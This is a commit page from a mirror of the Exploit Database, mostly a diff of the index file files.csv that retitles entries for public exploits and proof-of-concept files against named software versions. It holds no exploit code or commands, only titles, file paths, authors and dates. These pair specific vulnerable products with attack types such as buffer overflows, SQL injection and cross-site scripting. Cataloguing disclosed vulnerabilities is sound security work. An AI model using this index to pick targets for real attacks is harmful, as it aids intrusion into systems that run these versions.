bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-09-07

Browse source 
9 new exploits

Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service
Sambar FTP Server 6.4 - 'SIZE' Remote Denial of Service

Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)

2WIRE DSL Router (xslt) - Denial of Service
2WIRE DSL Router - 'xslt' Denial of Service

ooVoo 1.7.1.35 - (URL Protocol) Remote Unicode Buffer Overflow (PoC)
ooVoo 1.7.1.35 - 'URL Protocol' Remote Unicode Buffer Overflow (PoC)

Optimal Archive 1.38 - '.zip' File (SEH) (PoC)
Optimal Archive 1.38 - '.zip' File Exploit (SEH) (PoC)

Subtitle Translation Wizard 3.0.0 - (SEH) (PoC)
Subtitle Translation Wizard 3.0.0 - Exploit (SEH) (PoC)

Virtual DJ Trial 6.1.2 - Buffer Overflow (SEH) Crash (PoC)
Virtual DJ Trial 6.1.2 - Buffer Overflow Crash (SEH) (PoC)

VideoLAN VLC Media Player 1.1.9 - XSPF Local File Integer Overflow in XSPF Playlist parser
VideoLAN VLC Media Player 1.1.9 - XSPF Playlist Local File Integer Overflow

Winlog Lite SCADA HMI system - (SEH) Overwrite
Winlog Lite SCADA HMI system - Overwrite (SEH)

FL Studio 10 Producer Edition - (SEH) Buffer Overflow (PoC)
FL Studio 10 Producer Edition -Buffer Overflow (SEH) (PoC)
Sony PC Companion 2.1 - (DownloadURLToFile()) Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - (Load()) Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - (CheckCompatibility()) Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - (Admin_RemoveDirectory()) Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - 'DownloadURLToFile()' Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - 'Load()' Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - 'CheckCompatibility()' Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Stack Based Unicode Buffer Overflow

Sambar Server 6.0 - results.stm Post Request Buffer Overflow
Sambar Server 6.0 - 'results.stm' POST Request Buffer Overflow

Samba nttrans Reply - Integer Overflow
Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow
Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) Denial of Service
Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) Denial of Service
Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) (Denial of Service)
Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) (Denial of Service)

i.FTP 2.21 - (SEH) Overflow Crash (PoC)
i.FTP 2.21 - Overflow Crash (SEH) (PoC)

Sam Spade 1.14 - Scan From IP Address Field (SEH) Overflow Crash (SEH) (PoC)
Sam Spade 1.14 - Scan From IP Address Field Overflow Crash (SEH) (PoC)

TECO SG2 FBD Client 3.51 - '.gfb' Overwrite (SEH) Buffer Overflow
TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH)

Network Scanner 4.0.0.0 - (SEH)Crash (PoC)
Network Scanner 4.0.0.0 - Crash (SEH) (PoC)

Zortam Mp3 Media Studio 20.15 - Overflow (SEH) Denial of Service
Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service)

Symantec AntiVirus - Remote Stack Buffer Overflow in dec2lha Library
Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow

WebKit JSC - Heap Buffer Overflow in Intl.getCanonicalLocales
WebKit JSC - 'Intl.getCanonicalLocales' Heap Buffer Overflow

Firebird 1.0.2 FreeBSD 4.7-RELEASE - Privilege Escalation
Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Privilege Escalation

CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (Unicode SEH)
CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (SEH Unicode)
Quick Player 1.2 - Unicode Buffer Overflow
DJ Studio Pro 5.1.6.5.2 - (SEH) Exploit
Quick Player 1.2 - Unicode Buffer Overflow (1)
DJ Studio Pro 5.1.6.5.2 - Exploit (SEH)

Quick Player 1.2 - Unicode Buffer Overflow (Bindshell)
Quick Player 1.2 - Unicode Buffer Overflow (2)

Winamp 5.572 - (SEH) Exploit
Winamp 5.572 - Exploit (SEH)

ZipScan 2.2c - (SEH) Exploit
ZipScan 2.2c - Exploit (SEH)

Winamp 5.572 - 'whatsnew.txt' (SEH) (Metasploit)
Winamp 5.572 - 'whatsnew.txt' Exploit (SEH) (Metasploit)

Mediacoder 0.7.3.4672 - (SEH) Exploit
Mediacoder 0.7.3.4672 - Exploit (SEH)

SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow (PoC)
SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow (PoC)
MoreAmp - '.maf' Local Stack Buffer Overflow (SEH) (calc)
BlazeDVD 6.0 - '.plf' File (SEH) Universal Buffer Overflow
MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)
BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH)

ASX to MP3 Converter 3.1.2.1 - (SEH) Multiple OS ASLR + DEP Bypass (Metasploit)
ASX to MP3 Converter 3.1.2.1 - Multiple OS ASLR + DEP Bypass (SEH) (Metasploit)

MP3 Workstation 9.2.1.1.2 - (SEH) Exploit
MP3 Workstation 9.2.1.1.2 - Exploit (SEH)

DJ Studio Pro 8.1.3.2.1 - (SEH) Exploit
DJ Studio Pro 8.1.3.2.1 - Exploit (SEH)

MP3 Workstation 9.2.1.1.2 - (SEH) (Metasploit)
MP3 Workstation 9.2.1.1.2 - Exploit (SEH) (Metasploit)

iworkstation 9.3.2.1.4 - (SEH) Exploit
iworkstation 9.3.2.1.4 - Exploit (SEH)

Winamp 5.6 - Arbitrary Code Execution in MIDI Parser
Winamp 5.6 - 'MIDI Parser' Arbitrary Code Execution

BS.Player 2.57 - Buffer Overflow (Unicode SEH)
BS.Player 2.57 - Buffer Overflow (SEH Unicode)

Nokia MultiMedia Player 1.0 - (SEH Unicode)
Nokia MultiMedia Player 1.0 - Exploit (SEH Unicode)

POP Peeper 3.7 - (SEH) Exploit
POP Peeper 3.7 - Exploit (SEH)

Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (Unicode SEH)
Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (SEH Unicode)

BS.Player 2.57 - Buffer Overflow (Unicode SEH) (Metasploit)
BS.Player 2.57 - Buffer Overflow (SEH Unicode) (Metasploit)

DJ Studio Pro 5.1.6.5.2 - (SEH) (Metasploit)
DJ Studio Pro 5.1.6.5.2 - Exploit (SEH) (Metasploit)

Samba 2.0.7 SWAT - Logfile Permissions
Samba 2.0.7 - SWAT Logfile Permissions

Static HTTP Server 1.0 - (SEH) Overflow
Static HTTP Server 1.0 - Overflow (SEH)

ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (Unicode SEH)
ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (SEH Unicode)

Light Alloy 4.7.3 - '.m3u' Buffer Overflow (SEH) 'UNICODE'
Light Alloy 4.7.3 - '.m3u' Buffer Overflow (SEH Unicode)

GOM Player 2.2.53.5169 - Buffer Overflow (SEH) (.reg)
GOM Player 2.2.53.5169 - '.reg' Buffer Overflow (SEH)

Quick Search 1.1.0.189 - 'search textbox Buffer Overflow (Unicode SEH) (Egghunter)
Quick Search 1.1.0.189 - search textbox Buffer Overflow (SEH Unicode) (Egghunter)

Total Commander 8.52 - Overwrite (SEH) Buffer Overflow
Total Commander 8.52 - Overwrite Buffer Overflow (SEH)
TECO SG2 LAD Client 3.51 - '.gen' Overwrite (SEH) Buffer Overflow
TECO JN5 L510-DriveLink 1.482 - '.lf5' Overwrite (SEH) Buffer Overflow
TECO SG2 LAD Client 3.51 - '.gen' Overwrite Buffer Overflow (SEH)
TECO JN5 L510-DriveLink 1.482 - '.lf5' Overwrite Buffer Overflow (SEH)
Jungo DriverWizard WinDriver - Kernel Pool Overflow
Jungo DriverWizard WinDriver - Kernel Out-of-Bounds Write Privilege Escalation
Tor - Linux Sandbox Breakout via X11

Samba < 2.2.8 (Linux/BSD) - Remote Code Execution

Samba 3.0.4 SWAT - Authorisation Buffer Overflow
Samba 3.0.4 - SWAT Authorisation Buffer Overflow

BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) Universal
BigAnt Server 2.50 - GET Request Universal Remote Buffer Overflow (SEH)

Samba 2.2.x - nttrans Overflow (Metasploit)
Samba 2.2.x - 'nttrans' Overflow (Metasploit)

BigAnt Server 2.52 - (SEH) Exploit
BigAnt Server 2.52 - Exploit (SEH)

File Sharing Wizard 1.5.0 - (SEH) Exploit
File Sharing Wizard 1.5.0 - Exploit (SEH)

Samba - 'Username' map script' Command Execution (Metasploit)
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)

Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)
Samba 2.2.8 (BSD x86) - 'trans2open' Overflow Exploit (Metasploit)

Samba 2.0.7 SWAT - Logging Failure
Samba 2.0.7 - SWAT Logging Failure

Sambar Server 4.4/5.0 - pagecount File Overwrite
Sambar Server 4.4/5.0 - 'pagecount' File Overwrite

Sambar Server 5.x - results.stm Cross-Site Scripting
Sambar Server 5.x - 'results.stm' Cross-Site Scripting

Samba SMB 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow

BigAnt Server 2.52 SP5 - (SEH) Stack Overflow ROP-Based Exploit (ASLR + DEP Bypass)
BigAnt Server 2.52 SP5 - Stack Overflow ROP-Based Exploit (SEH) (ASLR + DEP Bypass)

Sambar 5.x - Open Proxy / Authentication Bypass
Sambar Server 5.x - Open Proxy / Authentication Bypass
Sambar Server 6.1 Beta 2 - show.asp show Parameter Cross-Site Scripting
Sambar Server 6.1 Beta 2 - showperf.asp title Parameter Cross-Site Scripting
Sambar Server 6.1 Beta 2 - showini.asp Arbitrary File Access
Sambar Server 6.1 Beta 2 - 'show.asp' show Parameter Cross-Site Scripting
Sambar Server 6.1 Beta 2 - 'showperf.asp' title Parameter Cross-Site Scripting
Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access

Sambar Server 5.x/6.0/6.1 - results.stm indexname Cross-Site Scripting
Sambar Server 5.x/6.0/6.1 - 'results.stm' indexname Cross-Site Scripting

Ruby 1.9.1 - WEBrick Terminal Escape Sequence in Logs Command Injection
Ruby 1.9.1 - WEBrick 'Terminal Escape Sequence in Logs' Command Injection

Varnish 2.0.6 - Terminal Escape Sequence in Logs Command Injection
Varnish 2.0.6 - 'Terminal Escape Sequence in Logs' Command Injection
Yaws 1.55 - Terminal Escape Sequence in Logs Command Injection
Orion Application Server 2.0.7 - Terminal Escape Sequence in Logs Command Injection
Yaws 1.55 - 'Terminal Escape Sequence in Logs' Command Injection
Orion Application Server 2.0.7 - 'Terminal Escape Sequence in Logs' Command Injection

Sysax Multi Server 6.50 - HTTP File Share Overflow (SEH) Remote Code Execution (SEH)
Sysax Multi Server 6.50 - HTTP File Share Overflow Remote Code Execution (SEH)

Easy File Sharing Web Server 7.2 - (SEH) Overflow (Egghunter)
Easy File Sharing Web Server 7.2 - Overflow (Egghunter) (SEH)

Samba - 'is_known_pipename()' Arbitrary Module Load (Metasploit)
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)

WordPress Core & MU & Plugins - Privileges Unchecked in 'admin.php' / Multiple Information Disclosures
WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures

PHP-Nuke 8.0 - Cross-Site Scripting / HTML Code Injection in News Module
PHP-Nuke 8.0 - ' News Module Cross-Site Scripting / HTML Code Injection

PHP-decoda - Cross-Site Scripting In Video Tag
PHP-decoda - 'Video Tag' Cross-Site Scripting
vBulletin 4.x/5.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API
vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API
vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API Authenticated Persistent Cross-Site Scripting
vBulletin 4.x - breadcrumbs via xmlrpc API Authenticated SQL Injection

Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin)

WebKit - Stealing Variables via Page Navigation in 'FrameLoader::clear'
WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation

FineCMS 1.0  - Multiple Vulnerabilities
FineCMS 1.0 - Multiple Vulnerabilities

A2billing 2.x - SQL Injection
Cory Support - 'pr' Parameter SQL Injection
Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin)
Pay Banner Text Link Ad 1.0.6.1 - SQL Injection
This commit is contained in:
Offensive Security 2017-09-07 05:01:26 +00:00
parent 69443c8521
commit a1eeba1263
11 changed files with 1095 additions and 91 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

188
files.csv
View file

@ -438,7 +438,7 @@ id,file,description,date,author,platform,type,port
2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service",2006-12-13,shinnai,windows,dos,0
2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0
2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - (DLL-load Hijacking) Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos,0
2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service",2006-12-15,rgod,windows,dos,0
2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - 'SIZE' Remote Denial of Service",2006-12-15,rgod,windows,dos,0
2935,platforms/windows/dos/2935.sh,"Microsoft Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,windows,dos,0
2942,platforms/windows/dos/2942.py,"Star FTP Server 1.10 - (RETR) Remote Denial of Service",2006-12-17,Necro,windows,dos,0
2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control - 'ole32.dll' Denial of Service",2006-12-18,shinnai,windows,dos,0
@ -736,7 +736,7 @@ id,file,description,date,author,platform,type,port
5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)",2008-05-31,securfrog,windows,dos,0
5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
5749,platforms/multiple/dos/5749.pl,"Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
@ -846,9 +846,9 @@ id,file,description,date,author,platform,type,port
6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service (Metasploit)",2008-10-25,"Saint Patrick",windows,dos,0
6863,platforms/windows/dos/6863.pl,"PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service",2008-10-29,"Jeremy Brown",windows,dos,0
6926,platforms/windows/dos/6926.pl,"FTP Now 2.6 Server - Response Remote Crash (PoC)",2008-11-01,DeltahackingTEAM,windows,dos,0
7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router (xslt) - Denial of Service",2008-11-08,hkm,hardware,dos,0
7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router - 'xslt' Denial of Service",2008-11-08,hkm,hardware,dos,0
7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 (OSX) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,osx,dos,0
7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - (URL Protocol) Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0
7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - 'URL Protocol' Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0
7091,platforms/linux/dos/7091.c,"Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic Exploit",2008-11-11,"Andrea Bittau",linux,dos,0
7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - 'Community' Remote Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",windows,dos,0
7100,platforms/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module - Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",linux,dos,0
@ -1459,7 +1459,7 @@ id,file,description,date,author,platform,type,port
11966,platforms/windows/dos/11966.py,"Easy Icon Maker - '.ico' File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0
11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - '.wav' (PoC)",2010-03-30,"Richard leahy",windows,dos,0
11977,platforms/windows/dos/11977.pl,"CDTrustee - '.BAK' Local Crash (PoC)",2010-03-31,anonymous,windows,dos,0
11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' File (SEH) (PoC)",2010-03-31,TecR0c,windows,dos,0
11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' File Exploit (SEH) (PoC)",2010-03-31,TecR0c,windows,dos,0
11985,platforms/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",windows,dos,0
11987,platforms/windows/dos/11987.txt,"Adobe Reader - Escape From '.PDF'",2010-03-31,"Didier Stevens",windows,dos,0
12000,platforms/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - '.mdb' Crash (PoC)",2010-04-01,anonymous,windows,dos,0
@ -1602,7 +1602,7 @@ id,file,description,date,author,platform,type,port
13939,platforms/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,windows,dos,0
13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,windows,dos,0
13959,platforms/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987
13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - (SEH) (PoC)",2010-06-22,blake,windows,dos,0
13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - Exploit (SEH) (PoC)",2010-06-22,blake,windows,dos,0
14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel - 'mountnfs()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0
14010,platforms/novell/dos/14010.txt,"Novell iManager - Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",novell,dos,48080
14012,platforms/multiple/dos/14012.txt,"Weborf HTTP Server - Denial of Service",2010-06-24,Crash,multiple,dos,80
@ -1702,7 +1702,7 @@ id,file,description,date,author,platform,type,port
14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service",2010-09-03,"Matthew Bergin",windows,dos,0
14892,platforms/windows/dos/14892.py,"VideoLAN VLC Media Player < 1.1.4 - '.xspf' 'smb://' URI Handling Remote Stack Overflow (PoC)",2010-09-04,s-dz,windows,dos,0
14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow (PoC)",2010-09-05,0x6264,linux,dos,0
14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - Buffer Overflow (SEH) Crash (PoC)",2010-09-05,"Abhishek Lyall",windows,dos,0
14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - Buffer Overflow Crash (SEH) (PoC)",2010-09-05,"Abhishek Lyall",windows,dos,0
14916,platforms/windows/dos/14916.py,"HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe' 'execvp_nc' Remote Code Execution",2010-09-06,Abysssec,windows,dos,0
14928,platforms/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,novell,dos,0
14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - '.wav' Denial of Service",2010-09-07,s-dz,windows,dos,0
@ -1971,7 +1971,7 @@ id,file,description,date,author,platform,type,port
17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos,0
18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0
17363,platforms/windows/dos/17363.pl,"1ClickUnzip 3.00 - '.zip' Heap Overflow",2011-06-06,"C4SS!0 G0M3S",windows,dos,0
17372,platforms/windows/dos/17372.txt,"VideoLAN VLC Media Player 1.1.9 - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0
17372,platforms/windows/dos/17372.txt,"VideoLAN VLC Media Player 1.1.9 - XSPF Playlist Local File Integer Overflow",2011-06-08,TecR0c,windows,dos,0
17455,platforms/windows/dos/17455.rb,"SmallFTPd 1.0.3 - Denial of Service",2011-06-27,"Myo Soe",windows,dos,0
17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow",2011-06-11,huimaozi,windows,dos,0
17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 - Remote Crash",2011-06-14,echo,windows,dos,0
@ -2546,7 +2546,7 @@ id,file,description,date,author,platform,type,port
20883,platforms/windows/dos/20883.txt,"Faust Informatics FreeStyle Chat 4.1 SR2 MS-DOS Device Name - Denial of Service",2001-05-25,nemesystm,windows,dos,0
20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0
20907,platforms/windows/dos/20907.sh,"Microsoft Windows Server 2000 - Telnet 'Username' Denial of Service",2001-06-07,"Michal Zalewski",windows,dos,0
20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - (SEH) Overwrite",2012-08-29,Ciph3r,windows,dos,0
20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - Overwrite (SEH)",2012-08-29,Ciph3r,windows,dos,0
20955,platforms/windows/dos/20955.pl,"Internet Download Manager - Memory Corruption",2012-08-31,Dark-Puzzle,windows,dos,0
20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow Denial of Service",2001-06-12,"Jass Seljamaa",osx,dos,0
20930,platforms/windows/dos/20930.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (PoC)",2001-06-18,Ps0,windows,dos,0
@ -2697,7 +2697,7 @@ id,file,description,date,author,platform,type,port
21821,platforms/windows/dos/21821.c,"Trillian 0.74 - IRC PART Message Denial of Service",2002-09-22,"Lance Fitz-Herbert",windows,dos,0
21823,platforms/windows/dos/21823.c,"Trillian 0.74 - IRC Oversized Data Block Buffer Overflow",2002-09-22,"Lance Fitz-Herbert",windows,dos,0
21824,platforms/windows/dos/21824.pl,"Arctic Torrent 1.2.3 - Memory Corruption (Denial of Service)",2012-10-09,"Jean Pascal Pereira",windows,dos,0
21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition - (SEH) Buffer Overflow (PoC)",2012-10-09,Dark-Puzzle,windows,dos,0
21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition -Buffer Overflow (SEH) (PoC)",2012-10-09,Dark-Puzzle,windows,dos,0
21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch - Device Reset Denial of Service",2002-09-24,"Brook Powers",hardware,dos,0
21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - 'UNICODE' Null Pointer Dereference",2012-10-09,wh1ant,windows,dos,0
21854,platforms/linux/dos/21854.c,"Apache 2.0.39/40 - Oversized STDERR Buffer Denial of Service",2002-09-24,"K.C. Wong",linux,dos,0
@ -3060,10 +3060,10 @@ id,file,description,date,author,platform,type,port
23540,platforms/freebsd/dos/23540.c,"KAME Racoon - 'Initial Contact' SA Deletion",2004-01-14,"Thomas Walpuski",freebsd,dos,0
23543,platforms/multiple/dos/23543.txt,"Vicomsoft RapidCache Server 2.0/2.2.6 - Host Argument Denial of Service",2004-01-15,"Peter Winter-Smith",multiple,dos,0
23556,platforms/multiple/dos/23556.txt,"GetWare Web Server Component - Content-Length Value Remote Denial of Service",2004-01-19,"Luigi Auriemma",multiple,dos,0
23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 - (DownloadURLToFile()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23567,platforms/windows/dos/23567.txt,"Sony PC Companion 2.1 - (Load()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 - (CheckCompatibility()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 - (Admin_RemoveDirectory()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 - 'DownloadURLToFile()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23567,platforms/windows/dos/23567.txt,"Sony PC Companion 2.1 - 'Load()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 - 'CheckCompatibility()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 - Null Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0
23584,platforms/windows/dos/23584.c,"McAfee ePolicy Orchestrator 1.x/2.x/3.0 - Agent HTTP POST Buffer Mismanagement",2004-01-22,cyber_flash,windows,dos,0
23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",multiple,dos,0
@ -3082,7 +3082,7 @@ id,file,description,date,author,platform,type,port
23656,platforms/multiple/dos/23656.txt,"Oracle 9.x - Database Parameter / Statement Buffer Overflow",2003-02-05,NGSSoftware,multiple,dos,0
23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String",2004-02-07,shaun2k2,windows,dos,0
23662,platforms/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos,0
23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - results.stm Post Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0
23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - 'results.stm' POST Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0
23665,platforms/windows/dos/23665.c,"Shaun2k2 Palmhttpd Server 3.0 - Remote Denial of Service",2004-02-09,shaun2k2,windows,dos,0
23667,platforms/linux/dos/23667.txt,"ClamAV Daemon 0.65 - Malformed UUEncoded Message Denial of Service",2004-02-09,"Oliver Eikemeier",linux,dos,0
23672,platforms/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Vulnerabilities",2004-02-09,"Bruno Morisson",hardware,dos,0
@ -3549,7 +3549,7 @@ id,file,description,date,author,platform,type,port
27765,platforms/linux/dos/27765.txt,"LibTiff 3.x - Double-Free Memory Corruption",2008-04-28,"Tavis Ormandy",linux,dos,0
27856,platforms/linux/dos/27856.txt,"GNU BinUtils 2.1x - Buffer Overflow",2006-05-11,"Jesus Olmos Gonzalez",linux,dos,0
27775,platforms/hardware/dos/27775.py,"Netgear ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",hardware,dos,0
27778,platforms/linux/dos/27778.txt,"Samba nttrans Reply - Integer Overflow",2013-08-22,x90c,linux,dos,139
27778,platforms/linux/dos/27778.txt,"Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow",2013-08-22,x90c,linux,dos,139
